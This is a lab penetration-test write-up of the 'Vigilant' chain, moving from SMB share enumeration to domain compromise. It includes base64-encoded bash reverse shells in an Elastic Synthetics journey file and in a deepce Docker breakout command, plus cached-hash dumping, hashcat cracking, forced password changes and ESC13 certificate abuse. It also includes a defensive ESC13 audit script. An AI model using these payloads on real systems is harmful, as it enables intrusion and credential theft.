Vigilant (Chain)

Operating System: Microsoft Windows Server 2022 Standard
Chain: True (2 Machines)
Credentials
svc_auditreporter : DeVeLoPeR712 (domain user, extracted from .dll)
Pamela.Clark : Vigilant@Tech2024 (domain user, extracted from decrypted PDF)
Alex.Powell : Vigilant_Market2024 (domain user, extracted from decrypted PDF)
Edwin.Dixon : Vigilant_Finance$ (domain user, extracted from decrypted PDF)
Daniel.Washington : Vigilant&Strategy! (domain user, extracted from decrypted PDF)
✅ Valid Usernames
Adrian.Hunter
Adrian.Ray
Albert.Shelton
Alexa.Chavez
Alex.Alexander
Alex.Bailey
Alex.Powell
Alyssa.Gonzalez
Amelia.Morales
Amy.Ross
Arlene.Fowler
Audrey.Austin
Avery.Sanchez
Bertha.Hopkins
Bessie.Fuller
Brandie.Mason
Brandon.Lambert
Brandy.Edwards
Byron.Gordon
Carole.Dean
Caroline.Chavez
Carter.Ruiz
Chad.Meyer
Charlene.Flores
Charlene.Jenkins
Cindy.Steeves
Clara.Carlson
Clarence.Dunn
Claude.Stone
Daniel.Washington
Dan.Wells
Deanna.Johnston
Denise.Grant
Dylan.Mason
Eduardo.Anderson
Eduardo.Burns
Edwin.Dixon
Erika.Armstrong
Ethan.Carter
Ethel.Armstrong
Everett.Morrison
Frances.Lewis
Gabriella.Morrison
Gabriel.Stewart
Heather.Green
Isobel.Martin
Ivan.Mendoza
Jerome.Perry
John.Chapman
Kristina.Perry
Lauren.Cooper
Leah.Sullivan
Leo.Mitchell
Leona.Adams
Lewis.Newman
Lily.Young
Marcia.Hudson
Nathan.Stanley
Nicole.Thompson
Pamela.Clark
Patrick.Hart
Paul.Brewer
Phyllis.Silva
Randy.Tucker
Rene.Chapman
Robin.Wagner
Rodney.Smith
Roland.Johnson
Scott.Rivera
Shannon.Simpson
Sophia.Kelley
Stacy.Richardson
svc_auditreporter
svc_elastic
svc_iis
Tiffany.Nelson
Timmothy.Bates
Tonya.Lynch
Travis.Willis
Tristan.Payne
Tyler.Holmes
Tyrone.Carroll
Veronica.Ruiz
Wesley.Rogers
William.Fernandez
🔑 Passwords list
Information Gathering
Nmap Scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5601/tcp open esmagent
9200/tcp open wap-wsp
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Service enumeration
vigilant.vl
DNS
Not vulnerable to DNS Zone transfer
SMB (enum4linux-ng)
Domain SID: S-1-5-21-2615182196-3196294898-3079774137
Root/parent domain
SMB signing: true (Not vulnerable to NTLM Relay attacks)
NetBIOS computer name: DC
NetBIOS domain name: VIGILANT
Domain: vigilant.vl
FQDN: DC.vigilant.vl
Server allows null session authentication
Server allows guest session authentication (useful for enumeration)
HTTP: 5601
Elastic instance

10.10.145.214
HTTP: 80

Compromise SRV
Initial Foothold on SRV
Discovering sensitive files on SMB
❯ nxc smb vigilant.vl -u 'Intrusionz3r0' -p '' --shares -M spider_plus
❯ nxc smb vigilant.vl -u 'Intrusionz3r0' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True
❯ tree /tmp/nxc_hosted/nxc_spider_plus/10.10.145.213
/tmp/nxc_hosted/nxc_spider_plus/10.10.145.213
└── ITShare
└── IT_Support
├── ADAudit
│ ├── ADAudit.dll
│ ├── ADAuditLib.dll
│ ├── ADAuditLib.pdb
│ ├── ADAudit.pdb
│ ├── ADAudit.runtimeconfig.json
│ ├── itext.bouncy-castle-connector.dll
│ ├── itext.pdfua.dll
│ ├── Microsoft.DotNet.PlatformAbstractions.dll
│ ├── Microsoft.Extensions.DependencyInjection.Abstractions.dll
│ ├── Microsoft.Extensions.Logging.dll
│ └── Microsoft.Extensions.Primitives.dll
└── ADAuditReports
└── Password_Strength_Report_encrypted.pdf
5 directories, 12 files
Valuable file: Password_Strength_Report_encrypted.pdf
Discovering domain user credentials in ADAudit.dll
During the enumeration the tester found ADAudit.dll, which contains svc_auditreporter's plaintext credentials.

Credentials: svc_auditreporter : DeVeLoPeR712
Decrypting the PDF
using System;
using System.IO;

class PDFDecryptTool
{
    static void Main(string[] args)
    {
        Console.WriteLine("PDF Decryption Tool");
        Console.WriteLine("-------------------\n");
        if (args.Length == 0 || args[0] == "/?")
        {
            ShowHelp();
            return;
        }
        try
        {
            string inputFile = args[0];
            string outputFile = args.Length > 1 ? args[1] : GenerateOutputPath(inputFile);
            Console.WriteLine($"Decrypting: {inputFile}");
            DecryptFile(inputFile, outputFile);
            Console.WriteLine($"Success!\nDecrypted file saved to: {outputFile}");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"\nERROR: {ex.Message}");
        }
    }

    static void ShowHelp()
    {
        Console.WriteLine("Usage:");
        Console.WriteLine("  PDFDecryptTool.exe <encrypted_file> [output_file]");
        Console.WriteLine("\nExamples:");
        Console.WriteLine("  PDFDecryptTool.exe report_encrypted.pdf");
        Console.WriteLine("  PDFDecryptTool.exe encrypted.pdf decrypted.pdf");
    }

    // Three self-inverse steps: undo the byte-pair shuffle, swap the nibbles back,
    // then strip the XOR keystream. No secret is involved at any point.
    static void DecryptFile(string inputPath, string outputPath)
    {
        if (!File.Exists(inputPath))
            throw new FileNotFoundException("Input file not found");
        byte[] data = File.ReadAllBytes(inputPath);
        byte[] key = GenerateKey(data.Length);
        Unshuffle(ref data);
        for (int i = 0; i < data.Length; i++)
        {
            data[i] = (byte)((data[i] << 4) | (data[i] >> 4));
            data[i] ^= key[i % key.Length];
        }
        File.WriteAllBytes(outputPath, data);
    }

    // The keystream depends only on a constant seed and the file length,
    // so anyone holding the binary can regenerate it.
    static byte[] GenerateKey(int length)
    {
        byte[] key = new byte[length];
        new Random(12345).NextBytes(key);
        return key;
    }

    static void Unshuffle(ref byte[] data)
    {
        for (int i = 0; i < data.Length - 1; i += 2)
        {
            // Swap adjacent bytes
            byte temp = data[i];
            data[i] = data[i + 1];
            data[i + 1] = temp;
        }
    }

    static string GenerateOutputPath(string inputPath)
    {
        string dir = Path.GetDirectoryName(inputPath);
        string name = Path.GetFileNameWithoutExtension(inputPath)
            .Replace("_encrypted", "")
            .Replace("_crypted", "");
        string ext = Path.GetExtension(inputPath);
        return Path.Combine(dir, $"{name}_decrypted{ext}");
    }
}
PS C:\Temp\>PDFDecryptTool.exe Password_Strength_Report_encrypted.pdf decrypted.pdf
PDF Decryption Tool
-------------------
Decrypting: Password_Strength_Report_encrypted.pdf
Success!
Decrypted file saved to: decrypted.pdf
FLARE-VM Sun 05/04/2025 2:06:44.41

Authenticating on Elastic
The tester authenticated on Elastic using Pamela.Clark's credentials.

Discovering Pamela.Clark is a superuser

Getting a reverse shell using
The tester configured a monitor in http://10.10.224.229:5601/app/synthetics/add-monitor
step('Trying to execute commands', async () => {
    await page.goto('file:///etc/passwd');
});

Creating a synthetics project
❯ npm install -g @elastic/synthetics
❯ npx @elastic/synthetics init Abusing
Need to install the following packages:
@elastic/synthetics@1.18.0
Ok to proceed? (y) Y
> Initializing Synthetics project in 'Abusing'
✔ Enter Elastic Kibana URL or Cloud ID · http://10.10.224.229:5601/
✔ What is your API key · ************************************************************
✔ Select the locations where you want to run monitors · Marketing Page (private)
✔ Set default schedule in minutes for all monitors · 1
✔ Choose project id to logically group monitors · Abusing
✔ Choose the target Kibana space · default
> Setting up project using NPM...
Wrote to /home/Intrusionz3r0/Documents/Vulnlabs/Vigilant/Content/Abusing/package.json:
{
"name": "abusing",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"keywords": [],
"author": "",
"license": "ISC"
}
> Installing @elastic/synthetics library...
added 142 packages, and audited 143 packages in 14s
29 packages are looking for funding
run `npm fund` for details
2 moderate severity vulnerabilities
Some issues need review, and may require choosing
a different dependency.
Run `npm audit` for details.
> Writing Abusing/synthetics.config.ts.
> Writing Abusing/journeys/advanced-example-helpers.ts.
> Writing Abusing/journeys/advanced-example.journey.ts.
> Writing Abusing/README.md.
> Writing Abusing/journeys/example.journey.ts.
> Writing Abusing/lightweight/heartbeat.yml.
> Writing Abusing/.github/workflows/run-synthetics.yml.
> Writing Abusing/package.json.
All set, you can run below commands inside: /home/Intrusionz3r0/Documents/Vulnlabs/Vigilant/Content/Abusing:
Run synthetic tests: npm run test
Push monitors to Kibana: SYNTHETICS_API_KEY=<value> npm run push
Configure API Key via `SYNTHETICS_API_KEY` env variable or --auth CLI flag.
Visit https://www.elastic.co/guide/en/observability/current/synthetic-run-tests.html to learn more.
Creating a malicious monitor
The tester modified journeys/example.journey.ts as follows:
import { journey, step, monitor, expect } from '@elastic/synthetics';

journey('My Example Journey', ({ page, params }) => {
    monitor.use({
        id: 'example-monitor',
        schedule: 1,
    });
    step('launch application', async () => {
        await page.goto('http://localhost/');
        const { execSync } = require('child_process');
        execSync('echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguNS40OC8xMjM0IDA+JjE=" | base64 -d | bash', { stdio: 'inherit' });
    });
    step('assert title', async () => {
        const header = await page.locator('h1');
        expect(await header.textContent()).toBe('todos');
    });
});
❯ SYNTHETICS_API_KEY=KEY npm run push

Compromise SRV via Docker Breakout
Discovering docker.sock was exposed
elastic-agent@srv:/opt$ find / -name "docker.sock" 2>/dev/null
/run/docker.sock
Escaping from the container via Docker breakout using deepce's SOCK method
elastic-agent@srv:/dev/shm$ sh deepce.sh --exploit SOCK --command "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUuNDgvNTU1NSAwPiYx|base64 -d|bash"
=====================================( Exploiting Sock )======================================
[+] Preparing Exploit
[+] Exploit Type ............. Custom Command
[+] Custom Command ........... echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUuNDgvNTU1NSAwPiYx|base64 -d|bash
[+] Clean up ................. Automatic on container exit
[+] Creating container ..... 63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26
[+] If the shell dies you can restart your listener and run the start command to fire it again
Start Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26/start
Logs Command: curl -s --unix-socket /var/run/docker.sock "http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26/logs?stderr=1&stdout=1" --output -
[+] Once complete remember to tidy up by stopping and removing your container with following commands
Stop Command: curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26/stop
Remove Command: curl -s -XDELETE --unix-socket /var/run/docker.sock http://localhost/containers/63b5a86f1784dd3586f30bc730b5700727fa7a0617bf1a4c55cf7248a2044e26
[+] Starting container ..... Success
[+] Sleeping for ........... 2s
[+] Fetching logs .......... Success
[+] Exploit completed ..... :)
==============================================================================================

Compromising Domain Controller
Initial foothold on DC
Discovering cached credentials
root@srv:/dev/shm# ./linikatz.sh
=[ @timb_machine ]=
I: [freeipa-check] FreeIPA AD configuration
-rw-r--r-- 1 root root 2169 Jul 25 2022 /etc/pki/fwupd/GPG-KEY-Linux-Foundation-Firmware
-rw-r--r-- 1 root root 959 Jul 25 2022 /etc/pki/fwupd/GPG-KEY-Linux-Vendor-Firmware-Service
-rw-r--r-- 1 root root 1679 Jul 25 2022 /etc/pki/fwupd/LVFS-CA.pem
-rw-r--r-- 1 root root 959 Jul 25 2022 /etc/pki/fwupd-metadata/GPG-KEY-Linux-Vendor-Firmware-Service
-rw-r--r-- 1 root root 2169 Jul 25 2022 /etc/pki/fwupd-metadata/GPG-KEY-Linux-Foundation-Metadata
-rw-r--r-- 1 root root 1679 Jul 25 2022 /etc/pki/fwupd-metadata/LVFS-CA.pem
I: [sss-check] SSS AD configuration
-rw-rw-r-- 1 root root 11567160 May 5 23:20 /var/lib/sss/mc/initgroups
-rw-rw-r-- 1 root root 9253600 May 5 23:20 /var/lib/sss/mc/passwd
-rw-rw-r-- 1 root root 6940392 May 5 23:20 /var/lib/sss/mc/group
-rw-r--r-- 1 root root 22 Mar 24 2024 /var/lib/sss/gpo_cache/vigilant.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
-rw-r--r-- 1 root root 1098 Mar 24 2024 '/var/lib/sss/gpo_cache/vigilant.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf'
-rw------- 1 root root 1286144 Mar 1 2024 /var/lib/sss/db/sssd.ldb
-rw------- 1 root root 2581 May 6 03:25 /var/lib/sss/db/ccache_VIGILANT.VL
-rw------- 1 root root 1286144 May 5 23:20 /var/lib/sss/db/config.ldb
-rw------- 1 root root 1609728 May 6 03:25 /var/lib/sss/db/timestamps_vigilant.vl.ldb
-rw------- 1 root root 2015232 May 6 03:35 /var/lib/sss/db/cache_vigilant.vl.ldb
-rw-r--r-- 1 root root 113 May 5 23:20 /var/lib/sss/pubconf/krb5.include.d/localauth_plugin
-rw-r--r-- 1 root root 15 May 5 23:20 /var/lib/sss/pubconf/krb5.include.d/domain_realm_vigilant_vl
-rw-r--r-- 1 root root 40 May 5 23:20 /var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
-rw-r--r-- 1 root root 14 May 6 03:25 /var/lib/sss/pubconf/kdcinfo.VIGILANT.VL
-rw------- 1 root root 615 Mar 24 2024 /etc/sssd/sssd.conf
I: [vintella-check] VAS AD configuration
I: [pbis-check] PBIS AD configuration
I: [samba-check] Samba configuration
-rw------- 1 root root 421888 Feb 27 2024 /var/lib/samba/account_policy.tdb
-rw------- 1 root root 421888 Feb 27 2024 /var/lib/samba/share_info.tdb
-rw------- 1 root root 696 Feb 27 2024 /var/lib/samba/group_mapping.tdb
-rw------- 1 root root 421888 Feb 27 2024 /var/lib/samba/private/passdb.tdb
-rw------- 1 root root 430080 Mar 24 2024 /var/lib/samba/private/secrets.tdb
-rw------- 1 root root 8888 May 5 23:20 /var/lib/samba/private/netlogon_creds_cli.tdb
-rw------- 1 root root 528384 Feb 27 2024 /var/lib/samba/registry.tdb
-rw------- 1 root root 32768 May 5 23:20 /var/lib/samba/winbindd_cache.tdb
-rw------- 1 root root 28672 Feb 27 2024 /var/cache/samba/printing/printers.tdb
-rw------- 1 root root 696 Feb 27 2024 /var/cache/samba/netsamlogon_cache.tdb
-rw-r--r-- 1 root root 234 Mar 24 2024 /var/cache/samba/browse.dat
-rw-r--r-- 1 root root 8950 Feb 27 2024 /etc/samba/smb.conf
-rw-r--r-- 1 root root 8 Oct 4 2023 /etc/samba/gdbcommands
I: [kerberos-check] Kerberos configuration
-rw-r--r-- 1 root root 488 May 5 23:20 /etc/krb5.conf
-rw------- 1 root root 1280 May 5 23:24 /etc/krb5.keytab
I: [samba-check] Samba machine secrets
I: [samba-check] Samba hashes
I: [check] Cached hashes
I: [sss-check] SSS hashes
$6$CI3DH6Ihe8SOgnFz$rzgx1xAQK4kz8YoMqQ90LrDmQs9nJEx9CujSE6BWInbeog6Uf1k9vd.Ub1V23KD2DzsK4RIWpWz/5Iw.RcQhp0\00cachedPasswordType\00\01\00\00\00\01\00\00\001
I: [check] Machine Kerberos tickets
I: [sss-check] SSS ticket list
Ticket cache: FILE:/var/lib/sss/db/ccache_VIGILANT.VL
Default principal: SRV$@VIGILANT.VL
Valid starting Expires Service principal
05/06/2025 03:25:58 05/06/2025 13:25:58 krbtgt/VIGILANT.VL@VIGILANT.VL
renew until 05/07/2025 03:25:58, Flags: RIA
Etype (skey, tkt): aes256-cts-hmac-sha1-96, aes256-cts-hmac-sha1-96 , AD types:
05/06/2025 03:25:58 05/06/2025 13:25:58 ldap/dc.vigilant.vl@VIGILANT.VL
renew until 05/07/2025 03:25:58, Flags: RAO
Etype (skey, tkt): aes256-cts-hmac-sha1-96, aes256-cts-hmac-sha1-96 , AD types:
<SNIF>
root@srv:/dev/shm#
Hash found: $6$CI3DH6Ihe8SOgnFz$rzgx1xAQK4kz8YoMqQ90LrDmQs9nJEx9CujSE6BWInbeog6Uf1k9vd.Ub1V23KD2DzsK4RIWpWz/5Iw.RcQhp0
Cracking the discovered hash
❯ hashcat -m 1800 cached.hash /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$6$CI3DH6Ihe8SOgnFz$rzgx1xAQK4kz8YoMqQ90LrDmQs9nJEx9CujSE6BWInbeog6Uf1k9vd.Ub1V23KD2DzsK4RIWpWz/5Iw.RcQhp0:&7Ujm*8Ik,(9
Changing Gabriel.Stewart's password
❯ nxc smb vigilant.vl -u users.txt -p '&7Ujm*8Ik,(9' --continue-on-success
<SNIF>
SMB 10.10.224.229 445 DC [-] vigilant.vl\Gabriel.Stewart:&7Ujm*8Ik,(9 STATUS_PASSWORD_EXPIRED
❯ impacket-changepasswd "vigilant.vl/Gabriel.Stewart:&7Ujm*8Ik,(9"@10.10.224.229 -newpass 'Password123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of vigilant.vl\Gabriel.Stewart
[*] Connecting to DCE/RPC as vigilant.vl\Gabriel.Stewart
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Compromise domain controller via ESC13
Discovering a template vulnerable to ESC13

Certificate Templates
  0
    Template Name                       : VigilantAdmins
    Display Name                        : Vigilant Admins
    Certificate Authorities             : vigilant-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
    Private Key Flag                    : 33685504
    Extended Key Usage                  : Smart Card Logon
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 200 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : VIGILANT.VL\Gabriel Stewart
                                          VIGILANT.VL\Domain Admins
                                          VIGILANT.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : VIGILANT.VL\Administrator
        Write Owner Principals          : VIGILANT.VL\Domain Admins
                                          VIGILANT.VL\Enterprise Admins
                                          VIGILANT.VL\Administrator
        Write Dacl Principals           : VIGILANT.VL\Domain Admins
                                          VIGILANT.VL\Enterprise Admins
                                          VIGILANT.VL\Administrator
        Write Property Principals       : VIGILANT.VL\Domain Admins
                                          VIGILANT.VL\Enterprise Admins
                                          VIGILANT.VL\Administrator
Requirements
The certificate template specifies an issuance policy (msPKI-Certificate-Policy)
#Retrieving certificate template and including its configured certificate issuance policies
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> Get-ADObject -Filter {Name -eq "VigilantAdmins"} -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=VIGILANT,DC=VL" -Properties msPKI-Certificate-Policy
DistinguishedName : CN=VigilantAdmins,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=vigilant,DC=vl
msPKI-Certificate-Policy : {1.3.6.1.4.1.45844.1337.1}
Name : VigilantAdmins
ObjectClass : pKICertificateTemplate
ObjectGUID : e0821ebc-f1e7-4c66-b952-d308fbf3e80e
That issuance policy is linked to a privileged group (msDS-OIDToGroupLink)
#Searching for certificate issuance policies that are linked to Active Directory groups via the msDS-OIDToGroupLink attribute
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> Get-ADObject -LDAPFilter "(msDS-OIDToGroupLink=*)" -SearchBase "CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=VIGILANT,DC=VL" -Properties msDS-OIDToGroupLink | Format-List Name, msDS-OIDToGroupLink
Name : 1.C4C92D522EAEB67B6205C6169671A0CE
msDS-OIDToGroupLink : CN=Temporary Admins,OU=VIGILANT,DC=vigilant,DC=vl
The linked group meets two conditions:
- It is empty (no members)
- It has universal scope (i.e., a forest-wide group like Enterprise Admins, Schema Admins, or any custom universal group)
#Listing the current members of the "Temporary Admins"
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents> Get-ADGroupMember -Identity "Temporary Admins"
#EMPTY
*Evil-WinRM* PS C:\Users\Gabriel.Stewart\Documents>

The certificate template allows Client Authentication
Certificate Templates
  0
    Template Name                       : VigilantAdmins
    Display Name                        : Vigilant Admins
    Certificate Authorities             : vigilant-CA
    Enabled                             : True
    Client Authentication               : True
🎉 The compromised user/computer can enroll in the certificate template.
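The three checks above (template issuance policy, OID-to-group link, scope and membership of the linked group, plus an auth-capable EKU and enrollment rights) tied together as one audit. This is an added example written for this page, not the tester's commands or Certipy's code; it assumes the RSAT ActiveDirectory module, read access to the Configuration partition, and that the Enroll right is identified by the Certificate-Enrollment extended-right GUID. The ESC13Exposed column is this script's own verdict.

```powershell
# ESC13 audit: added example, not code from the original write-up or from Certipy.
# Assumes the RSAT ActiveDirectory module and read access to the Configuration NC.
Import-Module ActiveDirectory

$cfgNC   = (Get-ADRootDSE).configurationNamingContext
$tplBase = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$cfgNC"
$oidBase = "CN=OID,CN=Public Key Services,CN=Services,$cfgNC"

$ClientAuthEku = '1.3.6.1.5.5.7.3.2'        # Client Authentication EKU
$SmartCardEku  = '1.3.6.1.4.1.311.20.2.2'   # Smart Card Logon EKU
$EnrollRight   = [guid]'0e10c968-78fb-11d1-adab-00c04fd8d5cd'  # Certificate-Enrollment extended right
$ExtendedRight = 256                        # ActiveDirectoryRights.ExtendedRight

# Condition 2: issuance-policy OID objects that carry msDS-OIDToGroupLink, keyed by policy OID
$policyToGroup = @{}
Get-ADObject -LDAPFilter '(msDS-OIDToGroupLink=*)' -SearchBase $oidBase `
    -Properties 'msPKI-Cert-Template-OID', 'msDS-OIDToGroupLink' |
    ForEach-Object { $policyToGroup[$_.'msPKI-Cert-Template-OID'] = $_.'msDS-OIDToGroupLink' }

# Condition 1: templates that reference an issuance policy (msPKI-Certificate-Policy)
Get-ADObject -LDAPFilter '(msPKI-Certificate-Policy=*)' -SearchBase $tplBase `
    -Properties 'msPKI-Certificate-Policy', 'pKIExtendedKeyUsage', 'nTSecurityDescriptor' |
ForEach-Object {
    $tpl  = $_
    $ekus = @($tpl.pKIExtendedKeyUsage)
    $authEku = ($ekus -contains $ClientAuthEku) -or ($ekus -contains $SmartCardEku)

    # Who may enroll: Allow ACEs granting the Enroll right (or every extended right)
    $enrollers = $tpl.nTSecurityDescriptor.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ((([int]$_.ActiveDirectoryRights) -band $ExtendedRight) -ne 0) -and
            ($_.ObjectType -eq $EnrollRight -or $_.ObjectType -eq [guid]::Empty)
        } | ForEach-Object { $_.IdentityReference.Value }

    foreach ($pol in @($tpl.'msPKI-Certificate-Policy')) {
        if (-not $policyToGroup.ContainsKey($pol)) { continue }
        # Condition 3: the linked group must be universal and have no members
        $grp     = Get-ADGroup -Identity $policyToGroup[$pol]
        $members = @(Get-ADGroupMember -Identity $grp)
        [pscustomobject]@{
            Template     = $tpl.Name
            PolicyOID    = $pol
            LinkedGroup  = $grp.Name
            GroupScope   = $grp.GroupScope
            MemberCount  = $members.Count
            ClientAuth   = $authEku
            Enrollers    = ($enrollers -join '; ')
            ESC13Exposed = $authEku -and ($grp.GroupScope -eq 'Universal') -and ($members.Count -eq 0)
        }
    }
}
```

A row with ESC13Exposed = True and a non-administrative principal in Enrollers is the combination seen on VigilantAdmins above; removing the OID-to-group link or the low-privileged enroll right closes it.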
Abusing ESC13 using Certipy
Unfortunately the machine is broken and the chain cannot continue, because the KDC's CA certificate has expired.
❯ certipy-ad req -u 'gabriel.stewart' -p 'Password123!' -ca vigilant-CA -target DC.vigilant.vl -template 'VigilantAdmins' -dc-ip 10.10.183.85 -key-size 4096 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Gabriel.Stewart@vigilant.vl'
[*] Certificate object SID is 'S-1-5-21-2615182196-3196294898-3079774137-1334'
[*] Saved certificate and private key to 'gabriel.stewart.pfx'
❯ certipy-ad auth -pfx gabriel.stewart.pfx -dc-ip 10.10.183.85
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: gabriel.stewart@vigilant.vl
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)